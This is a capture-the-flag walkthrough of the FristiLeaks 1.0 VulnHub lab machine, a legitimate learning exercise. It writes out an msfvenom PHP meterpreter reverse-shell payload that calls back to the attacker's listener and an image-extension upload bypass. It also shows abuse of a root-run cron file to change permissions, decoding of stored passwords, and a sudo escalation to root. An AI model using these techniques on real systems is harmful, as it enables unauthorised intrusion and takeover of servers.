Let's leak
I Picked this OS from vulnhub.com and booted this up in virtual box. From the site
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..
DISCLAIMER: This is a walkthrough so the solutions will be visible so be waned. Also I will try and explain every step in detail. I am no expert on this, I just really enjoy breaking this kind of stuff. So if you do read any misuse of a tools definition then please excuse my misconception.
With that out of the way let's begin.
Information gathering
Like any good pentest lets gather as much information on the what we are attack. I boot up the OS and find the IP address. From here we can do a typical nmap scan of the machine, but I'm willing to gamble that this is hosting a website. Don't be fooled by not using nmap, it's best to scan everything, but I'm skipping this. The image to the left is what we see when we enter the site (migraine inducing). Since this is a website let's use the Nikto tool. If you need more information on this tool there is an article here. In short this tool scans webservers for server options, server software, and index files.
nikto -h http://192.168.1.17 - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 192.168.1.17 + Target Hostname: 192.168.1.17 + Target Port: 80 + Start Time: 2017-01-30 18:56:28 (GMT-8) --------------------------------------------------------------------------- + Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 + Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: 0x524c0ef1d551d + The anti-clickjacking X-Frame-Options header is not present. + File/dir '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + File/dir '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + File/dir '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 3 entries which should be manually viewed. + PHP/5.3.3 appears to be outdated (current is at least 5.4.4) + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6545 items checked: 0 error(s) and 14 item(s) reported on remote host + End Time: 2017-01-30 18:56:39 (GMT-8) (11 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
The command -h after the call to nikto stands for host. After entering the IP address of our host nikto goes to town examining the site and showing us detailed information of the web server. What catches my eye is the directory /images. Going to this directory we find a simple directory with two images. One of the fristileaks image, and the other is of Obi-wan Kenobi. Well our first hint is that there are different URLs on this web server. Reading from the Nikto output we also see that it found three directories. '/cola' '/sisi' '/beer'. I went ahead and went to all three of these and found nothing but Obi-wan telling us what we already know. So now what? What we can do is try and deduce what they are trying to tell us with these urls. Let's guess some directory names, for instance /fristi.... Bingo.
We are greeted with a lovely image of Nelson Muntz from the cartoon show The Simpsons, and what appears to be a login.
The attack!
I take a look at the source of the webpage. Sometimes the webpages source can lend us a hand in finding information for instance, the source on this page shows us a small message:
super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.
TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz
So we have some information to keep in mind. One we might have a username (eezeepz), and two the image has been encoded to base64. We can see this by looking at the source page and viewing the image in source. In a green font color we see the encoding.
What needs to be done (in my case) was to download the image, which downloaded as a unknown file extension. I changed the extension to a .png and was able to view the image. So now we need to decode this, here is the command used:
echo 'iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BA....... gBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJRU5ErkJggg==' | base64 -D > download.png (for the sake of saving space I have removed some of the code)
The last few commands on this I will explain. First it's the | base64 which calls upon the tool base64. The next command is -D which tells the tool to decode. The last command is > which points to a file, in the case our image download.png. I encourage you to read on the man pages about these tools if this confuses you in any way. After this is decoded we get a different image this time:
Now we have another clue. In this case we might have either a username or a password. Let's try using eezeepz as the username and keKkeKKeKKeKkEkkEk as the password. What do you know we are able to login using these credentials. Once we are in there is only one link available which is an upload form. The only file that can be uploaded is an image. So from here we are going to create a shell to upload to this site. Specifically we are going to create a php shell. We are going to use msfvenom to create this:
sudo msfvenom -p php/meterpreter/reverse_tcp lhost=172.20.10.9 lport=4444 -f raw > poop.php
So let's go through this command. First let's open a new terminal and type in sudo. We call msfvenom our tool. The next command -p is our payload call. We will be calling our meterpreter shell using reverse_tcp php/meterpreter/reverse_tcp. We next need to setup our machine's IP address and a port for our shell. lhost=<your IP> lport=<any port>. Another command we need to make is our output format -f. Our format is going to be raw > filename.php. We are using a php shell so that's the format. You can call this php shell anything you want!
On another terminal we need to start metasploit. We will be using metasploit to listen for our shell.
msfconsole to fire up metasploit.
Then lets get ourselves an empty exploit. Use this while in msf: use multi/handler using the use command we tell metasploit to load up an exploit in this case we direct metasploit to an empty handler at multi/handler. We next need to load a payload onto our exploit. Using the same payload as our php shell we will be using meterpreter reverse_tcp. set payload php/meterpreter/reverse_tcp this command is setting the payload to the desired one. In this case as I've said it will be meterpreter with reverse_tcp. Our next step is to see the options for this payload. Type in show options on the msf console and it should show you some available options. We need a host IP and a listening port. Remember the settings we used for the php shell, use the same IP and port for this as well. Type exploit and now metasploit will be listening on the IP selected and once the shell is uploaded it will give us a meterpreter session. You should have metasploit waiting like this:
[*] Started reverse TCP handler on 172.20.10.9:4444
[*] Starting the payload handler...
Minimize this terminal for now and let's go back to the webpage with the upload option.
Upload the php shell you created with msfvenom. Make sure that it has the .png extension at the end (or any image extension). Once we have it uploaded we need to go to it on the web browser. In my case it will be:
http://192.168.1.17/fristi/uploads/poop.php.png
After you go to this site, it should just continue loading. Check back at your metasploit session and you should now see a meterpreter session like below:
[*] Started reverse TCP handler on 172.20.10.9:4444
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 172.20.10.12
[*] Meterpreter session 1 opened (172.20.10.9:4444 -> 192.168.1.17:49044) at 2017-01-31 12:45:49 -0800
let's see who is on this apache server. We can use standard linux terminal commands on here. So let's list out what we have here.
drwxr-xr-x. 5 root root 4096 Nov 19 2015 .
dr-xr-xr-x. 22 root root 4096 Jan 31 15:36 ..
drwx------. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigo
When trying to change to the admin folder we see that we can't because we don't have sufficient permissions to enter this. Let's see what our friend eezeepz has:
MAKEDEV chown hostname netreport taskset weak-modules
cbq clock hwclock netstat tc wipefs
cciss_id consoletype kbd_mode new-kernel-pkg telinit xfs_repair
cfdisk cpio kill nice touch ypdomainname
chcpu cryptsetup killall5 nisdomainname tracepath zcat
chgrp ctrlaltdel kpartx nologin tracepath6 zic
chkconfig cut nameif notes.txt true
chmod halt nano tar tune2fs
We can see some files in here, including some well known commands like chown, kill, and nano. But i did notice a text file notes.txt. Let's cat this file and read what it says:
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
So we can see that this current user doesn't have admin privileges. But the admin did set this user up to use chmod. What we can do is change the privileges to the admin folder with this command:
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
We can now change to the admin directory and list all the files that this user has:
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-rw-rw- 1 apache apache 35 Nov 23 14:32 runthis
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
We can see some interesting files. We should focus on the two text files and the python file. Cryptedpass.txt shows us: mVGZ3O3omkJLmy2pcuTq The next file cryptpass.py shows this:
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
And the last file is whoisyourgodnow.txt: =RFn0AKnlMHMPIzpyuTI0ITG. Reading the python script we can see that this script encodes the file to base64. So I needed to read around on figure this out but according to some we can write a python script to decode using this:
import codecs
str = 'mVGZ3O3omkJLmy2pcuTq'
str = codecs.decode(str, 'rot13')
str = str[::-1]
str = codecs.decode(str, 'base64')
print str
Using this command to run our python script: python poop.py "=RFn0AKnlMHMPIzpyuTI0ITG" we get this : LetThereBeFristi!. Next we do the same for the other encoded word and receive this thisisalsopw123. Now these could be passwords so let's keep that in mind. The next step to change the user to fristigod because this is out god now. Let's su frisitigod and we should be prompt to enter a password. Let's use LetThereBeFristi! We're in let's go ahead and list the files. We can see that there is a folder called /fristigod. We enter this and list:
-rw------- 1 fristigod fristigod .bash_history
drwxrwxr-x. 2 fristigod fristigod .secret_admin_stuff
Let's cat .bash_history but get nothing. Let's go ahead and:
sudo -l -U fristigod
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
sudo βu fristi .secret_admin_stuff/docom /bin/sh
id
cd /root
ls βla
cat fristileaks_secrets.txt
Read this:
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
this is the end...
This is was a really fun little OS. But I didn't do it under 4 hours as I was doing this between work and my spare time. Still I don't believe I would have gotten it under 4 hours if I had this without distractions. With all the research I was doing I needed to do while I was stuck on a few things this would have been impossible to beat in under 4 hours. But still I feel like I need to practice a ton more. Reading other walkthroughs I definitely feel like I have much more to grow.